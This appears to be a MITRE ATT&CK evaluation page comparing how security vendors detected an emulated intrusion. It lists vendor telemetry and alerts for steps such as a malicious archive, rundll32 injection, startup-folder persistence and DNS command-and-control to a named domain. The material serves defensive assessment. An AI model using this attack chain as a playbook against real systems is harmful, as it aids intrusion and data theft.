Home   >   Technique Comparison Tool
Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.
1.A.1 - User Execution
1.A.1 - Rundll32
1.A.1 - Scripting
1.B.1 - Registry Run Keys / Startup Folder
1.C.1 - Commonly Used Port
1.C.1 - Standard Application Layer Protocol
1.C.1 - Data Encoding
2.A.1 - System Network Configuration Discovery
2.A.2 - System Network Configuration Discovery
2.B.1 - System Owner/User Discovery
2.C.1 - Process Discovery
2.C.2 - Process Discovery
2.D.1 - System Service Discovery
2.D.2 - System Service Discovery
2.E.1 - System Information Discovery
2.E.2 - System Information Discovery
2.F.1 - Permission Groups Discovery
2.F.2 - Permission Groups Discovery
2.F.3 - Permission Groups Discovery
2.G.1 - Account Discovery
2.G.2 - Account Discovery
2.H.1 - Query Registry
3.A.1 - Bypass User Account Control
3.A.1 - Access Token Manipulation
3.B.1 - Process Discovery
3.C.1 - Process Injection
4.A.1 - Remote System Discovery
4.A.2 - Remote System Discovery
4.B.1 - System Network Configuration Discovery
4.C.1 - System Network Connections Discovery
5.A.1 - Credential Dumping
5.A.1 - Process Injection
5.A.2 - Credential Dumping
5.A.2 - Process Injection
5.B.1 - Access Token Manipulation
6.A.1 - Query Registry
6.B.1 - Commonly Used Port
6.B.1 - Standard Application Layer Protocol
6.B.1 - Multiband Communication
6.C.1 - Remote Desktop Protocol
7.A.1 - Create Account
7.A.1 - Graphical User Interface
7.A.1 - Account Discovery
7.B.1 - Remote File Copy
7.C.1 - Scheduled Task
8.A.1 - File and Directory Discovery
8.A.2 - File and Directory Discovery
8.B.1 - Process Discovery
8.C.1 - Input Capture
8.C.1 - Application Window Discovery
8.D.1 - Screen Capture
8.D.1 - Process Injection
9.A.1 - File and Directory Discovery
9.B.1 - Data from Network Shared Drive
9.B.1 - Exfiltration Over Command and Control Channel
10.A.1 - Registry Run Keys / Startup Folder
10.A.2 - Scheduled Task
10.B.1 - Valid Accounts
10.B.1 - Remote Desktop Protocol
11.A.1 - Scripting
11.B.1 - Commonly Used Port
11.B.1 - Standard Application Layer Protocol
11.B.1 - Standard Cryptographic Protocol
12.A.1 - System Network Configuration Discovery
12.A.2 - System Network Configuration Discovery
12.B.1 - System Owner/User Discovery
12.C.1 - Process Discovery
12.D.1 - System Service Discovery
12.E.1 - Scripting
12.E.1.1 - System Owner/User Discovery
12.E.1.2 - Permission Groups Discovery
12.E.1.3 - Password Policy Discovery
12.E.1.4.1 - File and Directory Discovery
12.E.1.4.2 - File and Directory Discovery
12.E.1.5 - Clipboard Data
12.E.1.6.1 - System Information Discovery
12.E.1.6.2 - System Information Discovery
12.E.1.7 - Query Registry
12.E.1.8 - System Service Discovery
12.E.1.9.1 - Network Share Discovery
12.E.1.9.2 - Network Share Discovery
12.E.1.10.1 - Security Software Discovery
12.E.1.10.2 - Security Software Discovery
12.E.1.11 - System Network Configuration Discovery
12.E.1.12 - System Network Connections Discovery
12.F.1 - Permission Groups Discovery
12.F.2 - Permission Groups Discovery
12.G.1 - Account Discovery
12.G.2 - Account Discovery
13.A.1 - Remote System Discovery
13.B.1 - System Network Connections Discovery
13.B.2 - System Network Connections Discovery
13.C.1 - Query Registry
14.A.1 - Bypass User Account Control
14.A.1 - Remote File Copy
14.A.1 - Standard Application Layer Protocol
14.A.1 - Commonly Used Port
15.A.1 - Input Capture
15.A.1 - Application Window Discovery
15.B.1 - Credentials in Files
16.A.1 - Brute Force
16.A.1 - Windows Admin Shares
16.B.1 - Valid Accounts
16.B.1 - Windows Admin Shares
16.B.1 - Brute Force
16.C.1 - Network Share Connection Removal
16.D.1 - Windows Admin Shares
16.D.1 - Valid Accounts
16.E.1 - Remote File Copy
16.F.1 - Command-Line Interface
16.G.1 - Remote File Copy
16.H.1 - System Service Discovery
16.I.1 - New Service
16.I.1 - Masquerading
16.J.1 - System Service Discovery
16.K.1 - File and Directory Discovery
16.L.1 - Service Execution
17.A.1 - System Service Discovery
17.A.1 - Query Registry
17.B.1 - File and Directory Permissions Modification
17.B.2 - File and Directory Permissions Modification
17.C.1 - Accessibility Features
18.A.1 - File and Directory Discovery
18.B.1 - Data Staged
18.B.1 - Data from Network Shared Drive
19.A.1 - Masquerading
19.A.1 - Remote File Copy
19.B.1 - Data Compressed
19.B.1 - Data Encrypted
19.B.1 - Masquerading
19.C.1 - Exfiltration Over Alternative Protocol
19.D.1 - File Deletion
19.D.2 - File Deletion
20.A.1 - Accessibility Features
20.A.1 - Remote Desktop Protocol
20.B.1 - System Owner/User Discovery
Comprehensive Results


1.A.1 User Execution

Procedure: Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

Vendor
Detection Types Detection Notes
Carbon Black
Telemetry
Telemetry within the process tree showed Resume Viewer.exe running along with its children. [1] [2]
General Behavior
A General Behavior alert was generated indicating that the user Debbie executed Resume Viewer.exe. This alert had a severity score of 51/100 and was based upon "Newly Executed Applications". [1] [2]
CrowdStrike
Telemetry
Telemetry within the alert showed that Resume Viewer.exe executed, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not specifically taken in this instance. [1]
General Behavior
A General Behavior alert for Machine Learning showed that Resume Viewer.exe was executed and that it was detected as malicious. [1]
Cybereason
General Behavior
A General Behavior alert was generated based on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe was executed and running as a process. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. The provided screenshot was captured later in the evaluation and includes additional information appended to explorer.exe not relevant to this procedure. [1] [2] [3]
General Behavior
A General Behavior alert was generated based on the identification of Resume Viewer.exe as unknown malware by the Anti-Malware engine. Vendor stated that the capability would have prevented the execution of Resume Viewer.exe. [1] [2] [3]
Endgame
General Behavior
A General Behavior alert was generated for Malicious File Detection on the execution of Resume Viewer.exe. [1] [2]
Telemetry (Tainted)
Telemetry showed events surrounding the Resume Viewer.exe event to indicate execution (tainted by a parent Malicious File Detection). [1] [2]
FireEye
Telemetry
Telemetry showed Resume Viewer.exe executing with a parent process of explorer.exe. [1] [2]
General Behavior (Configuration Change)
A General Behavior alert was generated for the Resume Viewer.exe file due to it being labeled as malicious by a machine learning engine. The alert was generated after a configuration change of the file size limit for the machine learning engine. The vendor reported that this file would have been quarantined and prevented from executing. The scan type used to produce this alert is On-access, which means the scan occurs on file writes and executions. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated for the execution of a rare file (Resume Viewer.exe). The vendor reported that this behavior would have been prevented from executing. Screenshot is unavailable due to sensitivity of alert logic. [1]
Telemetry
Telemetry showed the execution of Resume Viewer.exe as a process. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe was executed. The telemetry was tainted by the parent Script File Created alert. [1]
McAfee
Telemetry
Telemetry showed that Resume Viewer.exe was executed by Explorer.exe by user Debbie. [1]
Microsoft
Telemetry
Telemetry showed the user execution sequence of Resume Viewer.exe with multiple files written and subsequently executed. Resume Viewer.exe was audited by Exploit Guard and the vendor stated that the audit events demonstrate that execution would have been prevented if Attack Surface Reduction (ASR) was enabled in blocking mode. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry
Telemetry showed that Resume Viewer.exe was executed and running as a process owned by user Debbie. [1]
RSA
Telemetry
Telemetry showed execution of Resume Viewer.exe. [1]
SentinelOne
General Behavior
A General Behavior alert was generated due to static analysis of the file through the DFI resulting in it being marked as suspicious, which generated a story (group ID) that subsequent linked events are tainted by. [1] [2]
Telemetry
Telemetry showed Resume Viewer.exe execution with subsequent file writes and execution. [1] [2]
Carbon Black
Enrichment
The capability enriched the rundll32.exe execution with the correct ATT&CK Technique (T1085, which corresponds to the Rundll32 Technique). [1] [2]
Telemetry
Telemetry within the process tree showed the Resume Viewer.exe execution sequence and rundll32.exe executing. [1] [2]
CrowdStrike
Specific Behavior
A Specific Behavior alert was generated due to rundll32 launching a suspended process. The alert was mapped to the correct ATT&CK Technique (Rundll32) and Tactic (Defense Evasion). [1] [2]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating rundll32 executing update.dat was suspicious. OverWatch is the managed threat hunting service. [1] [2]
Telemetry
Telemetry within the OverWatch alert showed rundll32.exe executing, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry within the rundll32.exe injection alert also showed full command-line arguments of rundll32.exe executing update.dat. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. For most alerts in the user interface, the telemetry behind it is separately available in the capability and counted as a separate detection. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for injected shellcode by a compromised legitimate process (rundll32.exe). The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and a related Technique (Process Injection) and was tainted by parent alert on rundll32.exe injection. [1] [2] [3]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for rundll32.exe launching a module in a temporary folder and injecting shell code into a victim process. The alert was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert called RunDLL32 with Suspicious DLL Location was generated due to rundll32.exe running update.dat. The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution) and was tainted by a parent Malicious File Detection alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed rundll32.exe running update.dat. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3]
FireEye
Enrichment
The capability enriched rundll32.exe with an alert for Rundll32 Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution). [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified use of rundll32.exe to execute update.dat with command-line arguments. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
Telemetry
Telemetry showed rundll32.exe executing update.dat. [1]
General Behavior
A General Behavior alert was generated for an unusual call to rundll32.exe. Screenshot is unavailable due to sensitivity of alert logic. [1]
Specific Behavior
A Specific Behavior alert was generated for rundll32.exe executing in a way typical for rundll32 injections. Screenshot is unavailable due to sensitivity of alert logic. [1]
GoSecure
Telemetry (Tainted)
Telemetry showed that cmd.exe created the rundll32.exe process that started update.dat. The telemetry was tainted by the parent Script File Created alert. [1]
McAfee
Telemetry (Tainted)
Telemetry showed cmd.exe executing update.dat via rundll32.exe. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3]
Specific Behavior
Specific Behavior alerts were generated based on suspicious indicators that a "Loaded non-DLL and non-CPL file with specified parameters via rundll32." The alerts were tagged with the correct ATT&CK Tactic (Defense Evasion, Execution) and Technique (Rundll32). [1] [2] [3]
Microsoft
Telemetry
Telemetry showed the execution sequence for rundll32.exe running update.dat. [1] [2]
General Behavior (Delayed)
A delayed General Behavior alert was generated for a low-reputation DLL loaded by a signed executable due to rundll32.exe execution of update.dat. [1] [2]
Palo Alto Networks
Specific Behavior (Tainted)
Specific Behavior alerts were generated for rundll32. The alerts were tagged with the correct ATT&CK Technique (Rundll32) and were tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed rundll32.exe executing update.dat with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4]
General Behavior (Tainted)
A General Behavior alert was generated based on rundll32.exe executing update.dat, identified as a suspicious DLL and malware. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated the capability would have prevented execution of update.dat. [1] [2] [3] [4]
RSA
Telemetry
Telemetry showed cmd.exe launching rundll32.exe. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed rundll32.exe executing as a result of Resume Viewer.exe running. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1]
Carbon Black
Enrichment
The capability enriched the cmd.exe execution with the correct ATT&CK Technique (T1064 - Scripting). [1] [2] [3] [4] [5] [6] [7]
Telemetry
Telemetry within the process tree showed cmd.exe executing the pdfhelper.cmd script. [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry
Telemetry showed pdfhelper.cmd being executed by cmd.exe. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
OverWatch generated a General Behavior alert indicating the execution of pdfhelper.cmd was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe launching pdfhelper.cmd. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Telemetry (Tainted)
Telemetry showed cmd.exe executing pdfhelper.cmd as well as pdfhelper.cmd spawning as a child process of Resume Viewer.exe. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5] [6] [7]
FireEye
Telemetry
Telemetry showed Resume Viewer.exe spawning the child process cmd.exe to launch pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running pdfhelper.cmd) has been tagged for monitoring because its parent process has a detection (Resume Viewer.exe). Screenshot is unavailable due to sensitivity of alert logic. [1] [2] [3] [4] [5]
Telemetry
Telemetry showed pdfhelper.cmd was executed by cmd.exe. [1] [2] [3] [4] [5]
GoSecure
Telemetry (Tainted)
Telemetry showed that Resume Viewer.exe created cmd.exe, which ran the script pdfhelper.cmd. The telemetry was tainted by the parent Script File Created alert. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed pdfhelper.cmd being executed by cmd.exe. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5]
Microsoft
Telemetry
Telemetry within a process tree showed the child cmd.exe process running the script pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Palo Alto Networks
Telemetry
Telemetry showed cmd.exe launching pdfhelper.cmd. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Specific Behavior
A Specific Behavior alert was generated for execution of the Windows script engine. The alert was tagged with the correct ATT&CK Technique (Scripting). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
RSA
None
No detection capability demonstrated for this procedure, though telemetry showed the execution sequence of Resume Viewer.exe executing cmd.exe, which executed rundll32.exe (the pdfhelper.cmd script was not shown). [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe executing the pdfhelper.cmd script. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed filemods indicating the creation and file write of autoupdate.bat to the Startup folder. [1] [2] [3]
Enrichment
The capability enriched cmd.exe with the correct ATT&CK Technique (T1060 - Registry Run Keys/Start Folder). [1] [2] [3]
CrowdStrike
Telemetry
Telemetry showed Registry activity related to the Startup folder. Though no screenshot of the file write is available, this data maybe indicative of modifications to the folder. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe rewriting autoupdate.bat to the user Debbie's Startup folder. The telemetry was tainted by a parent alert on explorer.exe attempting to execute a file (Resume Viewer.exe) identified as malicious. [1] [2] [3] [4]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert called "Detected Persistence - Start Folder Persistence" was generated due to cmd.exe writing autoupdate.bat to the Startup folder. The alert was also tagged with the correct ATT&CK Technique (T1060 - Registry Run Keys / Start Folder) and Tactic (Persistence). The Specific Behavior alert was tainted by a parent Malicious File Detection alert. [1] [2] [3]
Telemetry (Tainted)
Telemetry showed autoupdate.bat written to the Start Menu. The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the backdoor persisted by executing autoupdate.bat at system start due to its presence in the Startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed autoupdate.bat being written to the Startup folder. The alert mapped to two ATT&CK Techniques (T1059 - Command-Line Interface and T1105 - Remote File Copy), but they were not directly related to the Registry Run Keys / Startup Folder Technique under test in this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched the file write of autoupdate.bat to the Startup folder by categorizing it as Persistence. [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Telemetry
Telemetry showed cmd.exe executing autoupdate.bat from within the Startup folder. [1] [2] [3]
GoSecure
Telemetry
Telemetry showed that autoupdate.bat was created in the Startup folder. [1] [2] [3]
McAfee
Specific Behavior
A Specific Behavior alert was generated for "An exe/bat/lnk/dll file has been copied or renamed in the Windows Startup Folder" for persistence based on pdfhelper.cmd. The alert was tagged with the correct ATT&CK Tactic (Persistence) and Technique (Registry Run Keys / Start Folder). [1] [2]
Microsoft
Telemetry
Telemetry showed the execution sequence for Resume Viewer.exe writing autoupdate.bat to Debbie's Startup folder to establish persistence. [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed autoupdate.bat being moved to the user Debbie's Startup folder. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3]
Enrichment (Configuration Change, Tainted)
The capability enriched a file being created in the Startup folder with the correct ATT&CK Technique (Registry Run Keys / Start Folder). The data was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. The logic to produce the enrichment was configured after the start of the evaluation so it is identified as a config change. [1] [2] [3]
RSA
Telemetry
Telemetry showed a cmd.exe "rename to executable" event for autoupdate.bat in the Startup folder. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry on actions performed from Resume Viewer.exe showed autoupdate.bat being written to the Startup Folder. The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2] [3]
Carbon Black
Telemetry
Telemetry showed a network connection over UDP port 53. [1] [2] [3] [4] [5] [6]
CrowdStrike
None
No detection capability demonstrated for this procedure, though DNS requests for freegoogleadsenseinfo.com (C2 domain) were observed (no detection showed port 53 specifically). [1] [2] [3] [4]
Cybereason
Telemetry
Telemetry showed port 53 command and control traffic. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
None
No detection capability demonstrated for this procedure, though DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3] [4] [5] [6] [7] [8]
FireEye
Telemetry
Telemetry showed port 53 command and control traffic. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it observed the use of UDP port 53 for DNS command and control traffic. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
None
No detection capability demonstrated for this procedure. [1] [2] [3]
GoSecure
None
No detection capability demonstrated for this procedure, though DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
None
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Specific Behavior (Tainted)
A Specific Behavior alert was generated for a scripting engine (rundll32.exe) making a network connection over DNS ports. The alert was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed port 53 command and control traffic. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2] [3] [4] [5] [6] [7]
RSA
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4]
SentinelOne
None
No detection capability demonstrated for this procedure. DNS requests were observed (no detection showed port 53 specifically). [1] [2] [3]
Carbon Black
None
No detection capability demonstrated for this procedure. [1] [2] [3]
CrowdStrike
Specific Behavior
A Specific Behavior alert was generated for abnormally large DNS requests for freegoogleadsenseinfo.com (C2 domain) being sent. The alert was mapped to a related ATT&CK Technique (Exfiltration Over Alternative Protocol) and Tactic (Exfiltration). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior occurred because they observed suspected command and control or data exfiltration via DNS. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
OverWatch also generated a General Behavior alert indicating the DNS traffic was suspicious. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry within the OverWatch alert showed the DNS requests, and would also be available in a separate view. For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Cybereason
Telemetry (Tainted)
Telemetry showed rundll32.exe making DNS queries to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Endgame
Telemetry (Tainted)
Telemetry in the event tree view showed DNS requests spawning from rundll32.exe to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Malicious File Detection alert. [1] [2] [3] [4] [5]
FireEye
Indicator of Compromise
An Indicator of Compromise alert was generated for the hardcoded DNS record name syntax in the DNS lookups for freegoogleadsenseinfo.com (C2 domain). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control). [1] [2] [3] [4] [5] [6]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that command and control occurred via DNS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
F-Secure
Telemetry
Telemetry showed a trace of DNS queries being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1] [2] [3] [4] [5]
GoSecure
Telemetry
Telemetry showed that DNS requests to freegoogleadsenseinfo.com (C2 domain) were being performed out of svchost.exe on Nimda. [1] [2] [3] [4]
McAfee
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5]
Microsoft
Telemetry (Configuration Change)
Telemetry from showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The vendor stated that DNS telemetry is captured but it was not immediately visible in the portal. The vendor made changes to the portal during the test to enable by default the visibility of these events. [1] [2] [3] [4] [5]
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated. [1] [2]
RSA
None
No detection capability demonstrated for this procedure. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2]
Carbon Black
None
No detection capability demonstrated for this procedure.
CrowdStrike
Telemetry (Tainted)
Telemetry showed the base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Exfiltration alert. [1]
Cybereason
Telemetry (Tainted)
Telemetry showed base64-encoded DNS requests for freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by a parent Injected Shellcode alert. [1] [2]
Endgame
None
No detection capability demonstrated for this procedure.
FireEye
Telemetry (Tainted)
Telemetry showed base64-encoded DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Cobalt Strike DNS Beacon alert. [1]
F-Secure
Telemetry
Telemetry showed a trace of encoded DNS queries being made by rundll32.exe to freegoogleadsenseinfo.com (C2 domain). [1]
GoSecure
None
No detection capability demonstrated for this procedure, though the capability identified DNS queries (no detection showed data encoding specifically).
McAfee
None
No detection capability demonstrated for this procedure.
Microsoft
None
No detection capability demonstrated for this procedure.
Palo Alto Networks
None
No detection capability demonstrated for this procedure. Vendor stated that more information would be available if their firewall appliance was installed and activated.
RSA
None
No detection capability demonstrated for this procedure.
SentinelOne
Telemetry (Tainted)
Telemetry showed DNS requests with encoded content to freegoogleadsenseinfo.com (the C2 domain). The telemetry was tainted by the previous alert generated from Resume Viewer.exe because it was associated with the same story (Group ID). [1] [2]
Carbon Black
Telemetry
Telemetry within the process tree showed cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because ipconfig was one of the reconnaissance commands performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The process tree showed that all children cmd.exe processes under the parent rundll32.exe (including the one that ran ipconfig) were considered tainted and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Cybereason
Telemetry
Telemetry showed cmd.exe executing ipconfig with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment (Tainted)
The capability enriched cmd.exe executing ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery). The data was tainted by a parent Injected Shellcode alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
General Behavior (Configuration Change, Delayed, Tainted)
A delayed General Behavior alert triggered for a specified number of discovery techniques over a specified time period, which resulted in four Enumeration Command Sequence alerts for Step 2 (tainted by parent Malicious File Detection). This alert was configured after the start of the evaluation so is identified as a configuration change. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
A General Behavior alert called Unusual Child Process of RunDLL32 was generated for cmd.exe executing ipconfig.exe with command-line arguments. The alert was tainted as part of the event tree under a parent Malicious File Detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry (Tainted)
Telemetry within the event tree showed cmd.exe executing ipconfig.exe with command-line arguments (tainted by a parent Malicious File Detection). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that ipconfig.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
F-Secure
Enrichment
The capability enriched ipconfig.exe with a tag identifying the command as enumeration. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior
A General Behavior alert was generated for rundll32.exe launching cmd.exe (executing ipconfig) which was identified as extremely rare and suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe running ipconfig) has been tagged for monitoring because its parent process has a detection (rundll32.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed cmd.exe executing ipconfig.exe with command-line arguments and enriched the command with the condition Ipconfig All Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so this detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Enrichment
The capability enriched ipconfig.exe with the correct ATT&CK Tactic (Discovery) and Technique (System Network Configuration Discovery) and a suspicious indicator that the ipconfig utility displayed configuration information. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig.exe with command-line arguments. The telemetry was tainted by a trace detection on Resume Viewer.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert occurred due to a sequence of exploration commands that was classified as suspicious. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry
Telemetry showed the execution sequence of cmd.exe executing ipconfig.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed cmd.exe executing ipconfig with command-line arguments. The telemetry was tainted by a parent alert related to Resume Viewer.exe and suspicious execution of the Windows Scripting Engine. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Enrichment (Tainted)
